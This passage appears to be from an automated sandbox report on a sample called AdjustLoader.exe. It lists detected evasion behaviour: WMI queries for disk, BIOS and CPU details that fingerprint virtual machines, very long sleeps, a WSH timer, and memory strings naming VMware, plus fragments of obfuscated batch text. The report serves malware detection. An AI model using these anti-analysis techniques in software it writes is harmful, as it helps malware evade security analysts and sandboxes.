Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\AdjustLoader.exe Memory allocated: 1C8DC000000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Memory allocated: 1C8F5AF0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\AdjustLoader.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6801 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2980 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8063 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1288 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1524
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 651
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 521
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 429
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Found large amount of non-executed APIs
Source: C:\Windows\System32\conhost.exe API coverage: 4.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\AdjustLoader.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 1988 Thread sleep time: -55000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 6801 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep count: 2980 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2260 Thread sleep time: -49000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 3760 Thread sleep time: -49000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 Thread sleep count: 4329 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540 Thread sleep count: 1372 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928 Thread sleep count: 44 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048 Thread sleep count: 3950 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep count: 521 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 3192 Thread sleep count: 429 > 30
Source: C:\Windows\System32\dllhost.exe TID: 3192 Thread sleep time: -42900s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5012 Thread sleep count: 63 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5012 Thread sleep time: -63000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1448 Thread sleep count: 48 > 30
Source: C:\Windows\System32\lsass.exe TID: 1448 Thread sleep time: -48000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2148 Thread sleep count: 57 > 30
Source: C:\Windows\System32\svchost.exe TID: 2148 Thread sleep time: -57000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4624 Thread sleep count: 60 > 30
Source: C:\Windows\System32\svchost.exe TID: 4624 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7344 Thread sleep count: 59 > 30
Source: C:\Windows\System32\svchost.exe TID: 7344 Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5376 Thread sleep count: 59 > 30
Source: C:\Windows\System32\svchost.exe TID: 5376 Thread sleep time: -59000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D834 FindFirstFileExW, 47_2_0000024D9FF7D834
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7D9B8 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_0000024D9FF7D9B8
Source: C:\Users\user\Desktop\AdjustLoader.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.11.dr Binary or memory string: VMware
Source: Amcache.hve.11.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 0000003A.00000000.2385311485.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: powershell.exe, 00000027.00000002.2403335664.000002580047E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhMcIMpChCcgYUEMjfuaxuNgZnSqVwgKLWBsnRzGTsuwyguMcQOxKroPtFdvTZHLwsvbslyrGNhfarISSfoeHJZuIMZIOeMUKIZfLtuQsxRWjjOcW=COLCeNsbsGmQCBanusrChzLxMk
Source: Amcache.hve.11.dr Binary or memory string: vmci.sys
Source: powershell.exe, 00000008.00000002.2018154793.0000027B0052E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhMcIMpChCcgYUEMjfuaxuNgZnSqVwgKLWBsnRzGTsuwyguMcQOxKroPtFdvTZHLwsvbslyrGNhfarISSfoeHJZuIMZIOeMUKIZfLtuQsxRWjjOcW=COLCeNsbsGmQCBanusrChzLxMk
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: AdjustLoader.exe, 00000000.00000002.1674660423.000001C8DBFA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wscript.exe, 00000019.00000002.2025415526.000002530EA20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: Amcache.hve.11.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wscript.exe, 00000014.00000002.2007218592.000001E4E9F92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\h
Source: dwm.exe, 0000003B.00000000.2390348324.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: powershell.exe, 00000008.00000002.2018154793.0000027B002D2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: %dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%s%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%e%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTc
Source: Amcache.hve.11.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000039.00000000.2382060504.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000000.2385272501.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2391047732.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003E.00000000.2392692164.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000027.00000002.2403335664.00000258002DE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 